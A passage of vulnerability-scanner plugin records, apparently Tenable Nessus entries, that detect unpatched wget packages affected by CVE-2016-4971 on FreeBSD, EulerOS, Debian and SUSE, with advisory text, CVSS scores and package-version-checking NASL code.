Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91734);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-4971\");\n\n script_name(english:\"FreeBSD : wget -- HTTP to FTP redirection file name confusion vulnerability (6df56c60-3738-11e6-a671-60a44ce6887b)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Giuseppe Scrivano reports :\n\nOn a server redirect from HTTP to a FTP resource, wget would trust the\nHTTP server and uses the name in the redirected URL as the destination\nfilename.\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html\"\n );\n # https://vuxml.freebsd.org/freebsd/6df56c60-3738-11e6-a671-60a44ce6887b.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?695e4a7e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"wget<1.18\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-11T14:22:39", "description": "According to the version of the wget package installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - It was found that wget used a file name provided by the server for the downloaded file when following a HTTP redirect to a FTP server resource. This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client.(CVE-2016-4971)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-05-01T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP1 : wget (EulerOS-SA-2016-1064)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:wget", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2016-1064.NASL", "href": "https://www.tenable.com/plugins/nessus/99826", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99826);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-4971\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : wget (EulerOS-SA-2016-1064)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security 
update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the wget package installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - It was found that wget used a file name provided by the\n server for the downloaded file when following a HTTP\n redirect to a FTP server resource. This could cause\n wget to create a file with a different name than\n expected, possibly allowing the server to execute\n arbitrary code on the client.(CVE-2016-4971)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1064\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6dcd116e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected wget package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"wget-1.14-10.2.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-11T16:40:01", "description": "On a server redirect 
from HTTP to a FTP resource, wget would trust the HTTP server and uses the name in the redirected URL as the destination filename. This behaviour was changed and now it works similarly as a redirect from HTTP to another HTTP resource so the original name is used as the destination file. To keep the previous behaviour the user must provide --trust-server-names.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 1.13.4-3+deb7u3.\n\nWe recommend that you upgrade your wget packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-01T00:00:00", "type": "nessus", "title": "Debian DLA-536-1 : wget security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:wget", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-536.NASL", "href": 
"https://www.tenable.com/plugins/nessus/91903", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-536-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91903);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-4971\");\n\n script_name(english:\"Debian DLA-536-1 : wget security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"On a server redirect from HTTP to a FTP resource, wget would trust the\nHTTP server and uses the name in the redirected URL as the destination\nfilename. This behaviour was changed and now it works similarly as a\nredirect from HTTP to another HTTP resource so the original name is\nused as the destination file. To keep the previous behaviour the user\nmust provide --trust-server-names.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n1.13.4-3+deb7u3.\n\nWe recommend that you upgrade your wget packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/06/msg00037.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/wget\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected wget package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) 
audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"wget\", reference:\"1.13.4-3+deb7u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-02T16:53:30", "description": "This update for wget fixes the following issues :\n\n - CVE-2016-4971: A HTTP to FTP redirection file name confusion vulnerability was fixed. (bsc#984060).\n\n - CVE-2016-7098: A potential race condition was fixed by creating files with .tmp ext and making them accessible to the current user only. (bsc#995964) Bug fixed :\n\n - Wget failed with basicauth: Failed writing HTTP request:\n Bad file descriptor (bsc#958342)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-09-26T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : wget (SUSE-SU-2016:2358-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971", "CVE-2016-7098"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:wget", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2016-2358-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93714", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2358-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93714);\n script_version(\"2.11\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-4971\", \"CVE-2016-7098\");\n\n script_name(english:\"SUSE SLES11 Security Update : wget (SUSE-SU-2016:2358-1)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for wget fixes the following issues :\n\n - CVE-2016-4971: A HTTP to FTP redirection file name\n confusion vulnerability was fixed. (bsc#984060).\n\n - CVE-2016-7098: A potential race condition was fixed by\n creating files with .tmp ext and making them accessible\n to the current user only. (bsc#995964) Bug fixed :\n\n - Wget failed with basicauth: Failed writing HTTP request:\n Bad file descriptor (bsc#958342)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=958342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=984060\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=995964\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4971/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7098/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162358-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?049bf5c9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 5:zypper in -t patch sleclo50sp3-wget-12757=1\n\nSUSE Manager Proxy 2.1:zypper in -t patch slemap21-wget-12757=1\n\nSUSE Manager 2.1:zypper in -t patch sleman21-wget-12757=1\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-wget-12757=1\n\nSUSE Linux Enterprise Server 11-SP3-LTSS:zypper in -t patch\nslessp3-wget-12757=1\n\nSUSE Linux Enterprise Server 11-SECURITY:zypper in -t patch\nsecsp3-wget-12757=1\n\nSUSE Linux Enterprise Point of Sale 11-SP3:zypper in -t patch\nsleposp3-wget-12757=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-wget-12757=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3:zypper in -t patch\ndbgsp3-wget-12757=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n 
script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"wget-1.11.4-1.32.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"wget-1.11.4-1.32.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-02T16:54:23", "description": "This update for wget fixes the following issues :\n\n - Fix for HTTP to a FTP redirection file name confusion vulnerability (bsc#984060, CVE-2016-4971).\n\n - Work around a libidn vulnerability (bsc#937096, CVE-2015-2059).\n\n - Fix for wget fails with basicauth: Failed writing HTTP request: Bad file descriptor (bsc#958342)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-09-08T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : wget (SUSE-SU-2016:2226-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-2059", "CVE-2016-4971"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:wget", "p-cpe:/a:novell:suse_linux:wget-debuginfo", "p-cpe:/a:novell:suse_linux:wget-debugsource", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2016-2226-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93369", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2226-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93369);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-2059\", \"CVE-2016-4971\");\n script_bugtraq_id(72736);\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : wget (SUSE-SU-2016:2226-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for wget fixes the following issues :\n\n - Fix for HTTP to a FTP redirection file name confusion\n vulnerability (bsc#984060, CVE-2016-4971).\n\n - Work around a libidn vulnerability (bsc#937096,\n CVE-2015-2059).\n\n - Fix for wget fails with basicauth: Failed writing HTTP\n request: Bad file descriptor (bsc#958342)\n\nNote that Tenable 
Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=958342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=984060\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-2059/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4971/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162226-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0ac3f58d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-SP1:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2016-1309=1\n\nSUSE Linux Enterprise Desktop 12-SP1:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP1-2016-1309=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
